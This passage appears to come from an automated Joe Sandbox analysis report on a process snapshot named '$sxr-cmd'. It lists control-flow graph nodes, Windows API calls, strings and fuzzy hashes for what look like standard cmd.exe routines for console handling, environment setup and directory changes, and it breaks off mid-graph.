                                                                                                                      control_flow_graph 643 7ff615504d5c-7ff615504e4b InitializeCriticalSection call 7ff6155058e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff615500580 call 7ff615504a14 call 7ff615504ad0 call 7ff615505554 GetCommandLineW 654 7ff615504e4d-7ff615504e54 643->654 654->654 655 7ff615504e56-7ff615504e61 654->655 656 7ff6155051cf-7ff6155051e3 call 7ff6154f3278 call 7ff615504c1c 655->656 657 7ff615504e67-7ff615504e7b call 7ff615502e44 655->657 662 7ff615504e81-7ff615504ec3 GetCommandLineW call 7ff6155013e0 call 7ff6154fca40 657->662 663 7ff6155051ba-7ff6155051ce call 7ff6154f3278 call 7ff615504c1c 657->663 662->663 674 7ff615504ec9-7ff615504ee8 call 7ff61550417c call 7ff615502394 662->674 663->656 678 7ff615504eed-7ff615504ef5 674->678 678->678 679 7ff615504ef7-7ff615504f1f call 7ff6154faa54 678->679 682 7ff615504f95-7ff615504fee GetConsoleOutputCP GetCPInfo call 7ff6155051ec GetProcessHeap RtlAllocateHeap 679->682 683 7ff615504f21-7ff615504f30 679->683 689 7ff615505012-7ff615505018 682->689 690 7ff615504ff0-7ff615505006 GetConsoleTitleW 682->690 683->682 684 7ff615504f32-7ff615504f39 683->684 684->682 686 7ff615504f3b-7ff615504f77 call 7ff6154f3278 GetWindowsDirectoryW 684->686 695 7ff6155051b1-7ff6155051b9 call 7ff615504c1c 686->695 696 7ff615504f7d-7ff615504f90 call 7ff615503c24 686->696 693 7ff61550507a-7ff61550507e 689->693 694 7ff61550501a-7ff615505024 call 7ff615503578 689->694 690->689 692 7ff615505008-7ff61550500f 690->692 692->689 697 7ff615505080-7ff6155050b3 call 7ff61551b89c call 7ff6154f586c call 7ff6154f3240 call 7ff615503448 693->697 698 7ff6155050eb-7ff615505161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 710 7ff615505026-7ff615505030 694->710 695->663 696->682 724 7ff6155050b5-7ff6155050d0 call 7ff615503448 * 2 697->724 725 7ff6155050d2-7ff6155050d7 call 7ff6154f3278 697->725 702 7ff615505163-7ff615505167 698->702 703 7ff61550516f 698->703 702->703 708 7ff615505169-7ff61550516d 702->708 709 7ff615505172-7ff6155051af ??_V@YAXPEAX@Z call 7ff615508f80 703->709 708->703 708->709 711 7ff615505075 call 7ff61551cff0 710->711 712 7ff615505032-7ff615505059 GetStdHandle GetConsoleScreenBufferInfo 710->712 711->693 715 7ff61550505b-7ff615505067 712->715 716 7ff615505069-7ff615505073 712->716 715->693 716->693 716->711 729 7ff6155050dc-7ff6155050e6 GlobalFree 724->729 725->729 729->698
                                                                                                                      APIs
                                                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504D9A
                                                                                                                        • Part of subcall function 00007FF6155058E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF61551C6DB), ref: 00007FF6155058EF
                                                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504DBB
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615504DCA
                                                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504DE0
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615504DEE
                                                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E04
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF615500589
                                                                                                                        • Part of subcall function 00007FF615500580: SetConsoleMode.KERNELBASE ref: 00007FF61550059E
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF6155005AF
                                                                                                                        • Part of subcall function 00007FF615500580: GetConsoleMode.KERNELBASE ref: 00007FF6155005C5
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF6155005EF
                                                                                                                        • Part of subcall function 00007FF615500580: GetConsoleMode.KERNELBASE ref: 00007FF615500605
                                                                                                                        • Part of subcall function 00007FF615500580: _get_osfhandle.MSVCRT ref: 00007FF615500632
                                                                                                                        • Part of subcall function 00007FF615500580: SetConsoleMode.KERNELBASE ref: 00007FF615500647
                                                                                                                        • Part of subcall function 00007FF615504A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A28
                                                                                                                        • Part of subcall function 00007FF615504A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A66
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A7D
                                                                                                                        • Part of subcall function 00007FF615504A14: memmove.MSVCRT(?,?,00000000,00007FF6155049F1), ref: 00007FF615504A9A
                                                                                                                        • Part of subcall function 00007FF615504A14: RtlFreeHeap.NTDLL(?,?,00000000,00007FF6155049F1), ref: 00007FF615504AA2
                                                                                                                        • Part of subcall function 00007FF615504AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AD6
                                                                                                                        • Part of subcall function 00007FF615504AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F8798), ref: 00007FF615504AEF
                                                                                                                        • Part of subcall function 00007FF615505554: RegOpenKeyExW.ADVAPI32(?,00000000,?,00000001,?,00007FF615504E35), ref: 00007FF6155055DA
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505623
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505667
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF6155056BE
                                                                                                                        • Part of subcall function 00007FF615505554: RegQueryValueExW.ADVAPI32 ref: 00007FF615505702
                                                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E35
                                                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504E81
                                                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504F69
                                                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504F95
                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FB0
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FC1
                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FD8
                                                                                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615504FF8
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615505037
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550504B
                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6155050DF
                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6155050F2
                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550510F
                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF615505130
                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF61550514A
                                                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF615505175
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressHandleProcProcess$AllocateCommandCriticalFreeInfoLineLockSectionShared$AcquireAllocBufferCtrlDirectoryEnterEnvironmentFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenStringsTitleTypeWindowsmemmove
                                                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                      • API String ID: 2297636897-3021193919
                                                                                                                      • Opcode ID: 536be2111ed0953f3dee75fce9ce1c38d128c8596e8c6e30d0a1bc8c68bb0d9c
                                                                                                                      • Instruction ID: 97a781302d386e14fb73634bae7fd0adece471595a06d91dae2b6c71e2a04477
                                                                                                                      • Opcode Fuzzy Hash: 536be2111ed0953f3dee75fce9ce1c38d128c8596e8c6e30d0a1bc8c68bb0d9c
                                                                                                                      • Instruction Fuzzy Hash: 51C13E29A09E42D6EA049B21E8141B9FBA1FF89FB5F458135D94EC77B1EF3CAD458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 732 7ff615503c24-7ff615503c61 733 7ff61550ec5a-7ff61550ec5f 732->733 734 7ff615503c67-7ff615503c99 call 7ff6154faf14 call 7ff6154fca40 732->734 733->734 736 7ff61550ec65-7ff61550ec6a 733->736 743 7ff61550ec97-7ff61550eca1 call 7ff61550855c 734->743 744 7ff615503c9f-7ff615503cb2 call 7ff6154fb900 734->744 738 7ff61550412e-7ff61550415b call 7ff615508f80 736->738 744->743 749 7ff615503cb8-7ff615503cbc 744->749 750 7ff615503cbf-7ff615503cc7 749->750 750->750 751 7ff615503cc9-7ff615503ccd 750->751 752 7ff615503cd2-7ff615503cd8 751->752 753 7ff615503ce5-7ff615503d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff615503cda-7ff615503cdf 752->754 756 7ff615503fb8 753->756 757 7ff615503d68-7ff615503d6c 753->757 754->753 755 7ff615503faa-7ff615503fb3 754->755 755->752 759 7ff615503fc6-7ff615503fec GetLastError call 7ff61550855c call 7ff61550a5d6 756->759 757->756 758 7ff615503d72-7ff615503dcd towupper GetFullPathNameW 757->758 758->759 760 7ff615503dd3-7ff615503ddd 758->760 762 7ff615503ff1-7ff615504007 call 7ff61550855c _local_unwind 759->762 761 7ff615503de3-7ff615503dfb 760->761 760->762 764 7ff615503e01-7ff615503e11 761->764 765 7ff6155040fe-7ff615504119 call 7ff61550855c _local_unwind 761->765 773 7ff61550400c-7ff615504022 GetLastError 762->773 764->765 769 7ff615503e17-7ff615503e28 764->769 778 7ff61550411a-7ff615504127 call 7ff6154fff70 call 7ff61550855c 765->778 772 7ff615503e2c-7ff615503e34 769->772 772->772 775 7ff615503e36-7ff615503e3f 772->775 776 7ff615503e95-7ff615503e9c 773->776 777 7ff615504028-7ff61550402b 773->777 779 7ff615503e42-7ff615503e55 775->779 781 7ff615503ecf-7ff615503ed3 776->781 782 7ff615503e9e-7ff615503ec2 call 7ff615502978 776->782 777->776 780 7ff615504031-7ff615504047 call 7ff61550855c _local_unwind 777->780 805 7ff61550412c 778->805 784 7ff615503e57-7ff615503e60 779->784 785 7ff615503e66-7ff615503e8f GetFileAttributesW 779->785 802 7ff61550404c-7ff615504062 call 7ff61550855c _local_unwind 780->802 788 7ff615503ed5-7ff615503ef7 GetFileAttributesW 781->788 789 7ff615503f08-7ff615503f0b 781->789 795 7ff615503ec7-7ff615503ec9 782->795 784->785 793 7ff615503f9d-7ff615503fa5 784->793 785->773 785->776 796 7ff615503efd-7ff615503f02 788->796 797 7ff615504067-7ff615504098 GetLastError call 7ff61550855c _local_unwind 788->797 791 7ff615503f1e-7ff615503f40 SetCurrentDirectoryW 789->791 792 7ff615503f0d-7ff615503f11 789->792 800 7ff615503f46-7ff615503f62 call 7ff61550498c 791->800 801 7ff6155040b8-7ff6155040de GetLastError call 7ff61550855c _local_unwind 791->801 799 7ff615503f13-7ff615503f1c 792->799 792->800 793->779 795->781 795->802 796->789 804 7ff61550409d-7ff6155040b3 call 7ff61550855c _local_unwind 796->804 797->804 799->791 799->800 813 7ff615503f67-7ff615503f69 800->813 815 7ff6155040e3-7ff6155040f9 call 7ff61550855c _local_unwind 801->815 802->797 804->801 805->738 813->815 816 7ff615503f6f-7ff615503f98 call 7ff61550417c 813->816 815->765 816->778
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 1809961153-336475711
                                                                                                                      • Opcode ID: 08f7fbc338d514c2623eaeff65c67fab43d8a38d389f6037346b48594c1f00c7
                                                                                                                      • Instruction ID: 2e84282b262a4cc8c3b14f6c53fe7c21deb96a8e5d18a7cf85c5629f69be6de6
                                                                                                                      • Opcode Fuzzy Hash: 08f7fbc338d514c2623eaeff65c67fab43d8a38d389f6037346b48594c1f00c7
                                                                                                                      • Instruction Fuzzy Hash: 64D15C2A60CF85D2EA209B15E4542BAF7A1FB85F64F454236DA4EC36B5EF3CE944C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 914 7ff615502394-7ff615502416 memset call 7ff6154fca40 917 7ff61550241c-7ff615502453 GetModuleFileNameW call 7ff61550081c 914->917 918 7ff61550e0d2-7ff61550e0da call 7ff615504c1c 914->918 923 7ff61550e0db-7ff61550e0ee call 7ff61550498c 917->923 924 7ff615502459-7ff615502468 call 7ff61550081c 917->924 918->923 930 7ff61550e0f4-7ff61550e107 call 7ff61550498c 923->930 929 7ff61550246e-7ff61550247d call 7ff61550081c 924->929 924->930 935 7ff615502483-7ff615502492 call 7ff61550081c 929->935 936 7ff615502516-7ff615502524 call 7ff61550498c 929->936 939 7ff61550e10d-7ff61550e123 930->939 935->939 947 7ff615502498-7ff6155024a7 call 7ff61550081c 935->947 940 7ff615502529 936->940 942 7ff61550e13f-7ff61550e17a _wcsupr 939->942 943 7ff61550e125-7ff61550e139 wcschr 939->943 940->935 945 7ff61550e17c-7ff61550e17f 942->945 946 7ff61550e181-7ff61550e199 wcsrchr 942->946 943->942 944 7ff61550e27c 943->944 949 7ff61550e283-7ff61550e29b call 7ff61550498c 944->949 948 7ff61550e19c 945->948 946->948 956 7ff6155024ad-7ff6155024db call 7ff615503c24 947->956 957 7ff61550e2a1-7ff61550e2c3 _wcsicmp 947->957 951 7ff61550e1a0-7ff61550e1a7 948->951 949->957 951->951 954 7ff61550e1a9-7ff61550e1bb 951->954 958 7ff61550e1c1-7ff61550e1e6 954->958 959 7ff61550e264-7ff61550e277 call 7ff615501300 954->959 967 7ff6155024dd-7ff6155024e4 free 956->967 968 7ff6155024e9-7ff615502514 call 7ff615508f80 956->968 962 7ff61550e1e8-7ff61550e1f1 958->962 963 7ff61550e21a 958->963 959->944 965 7ff61550e201-7ff61550e210 962->965 966 7ff61550e1f3-7ff61550e1f6 962->966 969 7ff61550e21d-7ff61550e21f 963->969 965->963 971 7ff61550e212-7ff61550e218 965->971 966->965 970 7ff61550e1f8-7ff61550e1ff 966->970 967->968 969->949 973 7ff61550e221-7ff61550e228 969->973 970->965 970->966 971->969 975 7ff61550e22a-7ff61550e231 973->975 976 7ff61550e254-7ff61550e262 973->976 977 7ff61550e234-7ff61550e237 975->977 976->944 977->976 978 7ff61550e239-7ff61550e242 977->978 978->976 979 7ff61550e244-7ff61550e252 978->979 979->976 979->977
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprfreewcschr
                                                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                      • API String ID: 318233705-4197029667
                                                                                                                      • Opcode ID: 3fac042061c3c259f4f053ca2a9c67aff2e597e23252bd33948ed1b3656da57f
                                                                                                                      • Instruction ID: 2f775aeba4cc815e12ccbc6696c10ac7e7c31021b79f1fc58b5f315693c8ce8e
                                                                                                                      • Opcode Fuzzy Hash: 3fac042061c3c259f4f053ca2a9c67aff2e597e23252bd33948ed1b3656da57f
                                                                                                                      • Instruction Fuzzy Hash: FD914C7AB09E82C5EE259B60D8502B9A7A1FF48FA8F544136C94EC76B5DF3CE9058700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                      • String ID: CMD.EXE
                                                                                                                      • API String ID: 1606018815-3025314500
                                                                                                                      • Opcode ID: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
                                                                                                                      • Instruction ID: 6c9843fea481ef5d1aba046070d816e438ed1534b20a4149ee100e1a56b56fa0
                                                                                                                      • Opcode Fuzzy Hash: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
                                                                                                                      • Instruction Fuzzy Hash: 3A41DE39A09E42CBE7548B25E855178BBA1BF89F75F558179C90EC3371DF3CA8148740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 992 7ff6154fc620-7ff6154fc66f GetConsoleTitleW 993 7ff6154fc675-7ff6154fc687 call 7ff6154faf14 992->993 994 7ff61550c5f2 992->994 999 7ff6154fc68e-7ff6154fc69d call 7ff6154fca40 993->999 1000 7ff6154fc689 993->1000 996 7ff61550c5fc-7ff61550c60c GetLastError 994->996 998 7ff61550c5e3 call 7ff6154f3278 996->998 1004 7ff61550c5e8-7ff61550c5ed call 7ff61550855c 998->1004 999->1004 1006 7ff6154fc6a3-7ff6154fc6ac 999->1006 1000->999 1004->994 1007 7ff6154fc954-7ff6154fc95e call 7ff61550291c 1006->1007 1008 7ff6154fc6b2-7ff6154fc6c5 call 7ff6154fb9c0 1006->1008 1013 7ff6154fc964-7ff6154fc96b call 7ff6154f89c0 1007->1013 1014 7ff61550c5de-7ff61550c5e0 1007->1014 1015 7ff6154fc9b5-7ff6154fc9b8 call 7ff615505c6c 1008->1015 1016 7ff6154fc6cb-7ff6154fc6ce 1008->1016 1020 7ff6154fc970-7ff6154fc972 1013->1020 1014->998 1023 7ff6154fc9bd-7ff6154fc9c9 call 7ff61550855c 1015->1023 1016->1004 1018 7ff6154fc6d4-7ff6154fc6e9 1016->1018 1021 7ff61550c616-7ff61550c620 call 7ff61550855c 1018->1021 1022 7ff6154fc6ef-7ff6154fc6fa 1018->1022 1020->996 1024 7ff6154fc978-7ff6154fc99a towupper 1020->1024 1025 7ff61550c627 1021->1025 1022->1025 1026 7ff6154fc700-7ff6154fc713 1022->1026 1039 7ff6154fc9d0-7ff6154fc9d7 1023->1039 1029 7ff6154fc9a0-7ff6154fc9a9 1024->1029 1030 7ff61550c631 1025->1030 1026->1030 1031 7ff6154fc719-7ff6154fc72c 1026->1031 1029->1029 1034 7ff6154fc9ab-7ff6154fc9af 1029->1034 1036 7ff61550c63b 1030->1036 1035 7ff6154fc732-7ff6154fc747 call 7ff6154fd3f0 1031->1035 1031->1036 1034->1015 1037 7ff61550c60e-7ff61550c611 call 7ff61551ec14 1034->1037 1045 7ff6154fc74d-7ff6154fc750 1035->1045 1046 7ff6154fc8ac-7ff6154fc8af 1035->1046 1040 7ff61550c645 1036->1040 1037->1021 1043 7ff6154fc872-7ff6154fc8aa call 7ff61550855c call 7ff615508f80 1039->1043 1044 7ff6154fc9dd-7ff61550c6da SetConsoleTitleW 1039->1044 1050 7ff61550c64e-7ff61550c651 1040->1050 1044->1043 1051 7ff6154fc752-7ff6154fc764 call 7ff6154fbd38 1045->1051 1052 7ff6154fc76a-7ff6154fc76d 1045->1052 1046->1045 1049 7ff6154fc8b5-7ff6154fc8d3 wcsncmp 1046->1049 1049->1052 1056 7ff6154fc8d9 1049->1056 1057 7ff61550c657-7ff61550c65b 1050->1057 1058 7ff6154fc80d-7ff6154fc811 1050->1058 1051->1004 1051->1052 1054 7ff6154fc773-7ff6154fc77a 1052->1054 1055 7ff6154fc840-7ff6154fc84b call 7ff6154fcb40 1052->1055 1061 7ff6154fc780-7ff6154fc784 1054->1061 1076 7ff6154fc84d-7ff6154fc855 call 7ff6154fcad4 1055->1076 1077 7ff6154fc856-7ff6154fc86c 1055->1077 1056->1045 1057->1058 1063 7ff6154fc9e2-7ff6154fc9e7 1058->1063 1064 7ff6154fc817-7ff6154fc81b 1058->1064 1067 7ff6154fc83d 1061->1067 1068 7ff6154fc78a-7ff6154fc7a4 wcschr 1061->1068 1063->1064 1072 7ff6154fc9ed-7ff6154fc9f7 call 7ff61550291c 1063->1072 1070 7ff6154fc821 1064->1070 1071 7ff6154fca1b-7ff6154fca1f 1064->1071 1067->1055 1074 7ff6154fc8de-7ff6154fc8f7 1068->1074 1075 7ff6154fc7aa-7ff6154fc7ad 1068->1075 1079 7ff6154fc824-7ff6154fc82d 1070->1079 1071->1070 1078 7ff6154fca25-7ff61550c6b3 call 7ff6154f3278 1071->1078 1086 7ff6154fc9fd-7ff6154fca00 1072->1086 1087 7ff61550c684-7ff61550c698 call 7ff6154f3278 1072->1087 1082 7ff6154fc900-7ff6154fc908 1074->1082 1083 7ff6154fc7b0-7ff6154fc7b8 1075->1083 1076->1077 1077->1039 1077->1043 1078->1004 1079->1079 1080 7ff6154fc82f-7ff6154fc837 1079->1080 1080->1061 1080->1067 1082->1082 1088 7ff6154fc90a-7ff6154fc915 1082->1088 1083->1083 1089 7ff6154fc7ba-7ff6154fc7c7 1083->1089 1086->1064 1093 7ff6154fca06-7ff6154fca10 call 7ff6154f89c0 1086->1093 1087->1004 1094 7ff6154fc93a-7ff6154fc944 1088->1094 1095 7ff6154fc917 1088->1095 1089->1050 1096 7ff6154fc7cd-7ff6154fc7db 1089->1096 1093->1064 1111 7ff6154fca16-7ff61550c67f GetLastError call 7ff6154f3278 1093->1111 1103 7ff6154fca2a-7ff6154fca2f call 7ff615509158 1094->1103 1104 7ff6154fc94a 1094->1104 1100 7ff6154fc920-7ff6154fc928 1095->1100 1101 7ff6154fc7e0-7ff6154fc7e7 1096->1101 1106 7ff6154fc932-7ff6154fc938 1100->1106 1107 7ff6154fc92a-7ff6154fc92f 1100->1107 1108 7ff6154fc800-7ff6154fc803 1101->1108 1109 7ff6154fc7e9-7ff6154fc7f1 1101->1109 1103->1014 1104->1007 1106->1094 1106->1100 1107->1106 1108->1040 1113 7ff6154fc809 1108->1113 1109->1108 1112 